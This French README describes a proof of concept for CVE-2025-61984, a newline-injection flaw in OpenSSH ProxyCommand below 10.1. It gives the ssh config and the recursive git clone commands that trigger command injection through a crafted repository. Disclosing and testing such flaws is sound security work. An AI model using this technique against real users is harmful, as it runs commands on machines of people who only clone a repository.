
Preuve de concept démontrant une vulnérabilité d'injection de saut de ligne dans OpenSSH ProxyCommand (CVE-2025-61984), permettant une injection de commande via une configuration SSH spécialement conçue.
Ceci est une preuve de concept utilisant un saut de ligne pour tromper la commande ProxyCommand d'OpenSSH <10.1. Article complet.
Configurez un fichier .ssh/config contenant :
Host *.example.com
ProxyCommand some-command %r@%h:%p
(La commande n'a pas d'importance, il suffit qu'elle contienne un %r non entre guillemets dans ses arguments quelque part.)
Ensuite, exécutez (pour bash) :
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
Ou si vous utilisez fish comme $SHELL :
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
Si vous n'utilisez pas ce shell mais souhaitez tester cela, vous pouvez faire :
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc